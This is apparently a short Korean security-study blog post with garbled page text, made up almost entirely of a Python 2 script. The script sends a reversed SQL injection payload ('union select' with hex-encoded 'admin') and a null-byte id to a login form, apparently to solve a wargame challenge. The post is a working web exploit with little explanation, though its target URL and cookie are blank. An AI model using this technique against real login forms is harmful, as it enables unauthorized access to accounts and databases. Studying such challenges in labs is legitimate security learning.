Security Study/Source

sql injection reverse

๐“›๐“พ๐“ฌ๐“ฎ๐“ฝ๐“ฎ_๐“ข๐“ฝ๐“ฎ๐“ต๐“ต๐“ช 2015. 11. 21. 13:30
728x90
๋ฐ˜์‘ํ˜•
  1. import urllib
  2. import urllib2
  3.  
  4. url = ""
  5. req = urllib2.Request(url)
  6. sql = "union select 0x61646D696E 32%"
  7. data = "id=%00&pw=" + sql[::-1]
  8. #data = urllib.urlencode(data)
  9. req = urllib2.Request(url, data)
  10.  
  11. req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
  12. req.add_header('Cookie', 'PHPSESSID=')
  13.  
  14. response = urllib2.urlopen(req)
  15. headers = response.info().headers
  16. the_page = response.read()
  17.  
  18. print the_page


728x90
๋ฐ˜์‘ํ˜•
์ €์ž‘์žํ‘œ์‹œ